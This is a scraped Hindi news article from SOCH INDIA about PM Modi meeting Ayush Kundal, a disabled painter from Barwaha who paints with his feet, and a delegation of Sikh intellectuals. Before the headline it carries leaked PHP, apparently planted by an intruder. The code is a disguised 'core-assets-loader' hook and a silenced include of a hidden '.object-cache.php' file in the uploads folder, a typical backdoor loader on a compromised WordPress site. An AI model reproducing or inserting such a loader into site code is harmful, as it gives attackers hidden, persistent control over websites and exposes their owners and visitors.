add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पीएम मोदी की मुलाकात: आयुष कुंडल से मिलने के बाद बोले- यह मेरे लिए अविस्मरणीय क्षण, सिख बुद्धिजीवियों से भी मिले – SOCH INDIA
Menu

पीएम मोदी की मुलाकात: आयुष कुंडल से मिलने के बाद बोले- यह मेरे लिए अविस्मरणीय क्षण, सिख बुद्धिजीवियों से भी मिले

nobanner

विस्तार

प्रधानमंत्री नरेंद्र मोदी ने मध्य प्रदेश में खरगोन जिले के बड़वाह में निवासी आयुष कुंडल और सिख बुद्धिजीवियों के एक प्रतिनिधिमंडल से मुलाकात की। पीएम ने ट्वीट किया, आयुष कुंडल से मिलना मेरे लिए एक अविस्मरणीय क्षण बन गया। उसने जिस प्रकार पेंटिंग में महारत हासिल की और अपनी भावनाओं को पैर की उंगलियों से आकार दिया, वो हर किसी को प्रेरित करने वाला है। अनवरत प्रेरणा मिलती रहे, इसलिए मैं उन्हें ट्विटर पर फॉलो कर रहा हूं।

दरअसल, आयुष खरगोन से 80 किमी दूर बड़वाह नगर के रहने वाले हैं। वह उम्र संबंधी विकारों के चलते पैरों पर खड़ा नहीं हो सकते हैं। उसके हाथ भी काम नहीं करते हैं। वो बोल भी नहीं पाते हैं। इतनी शारीरिक कमियां होने के बाद भी अपने पैरों से पेंटिंग बनाते हैं।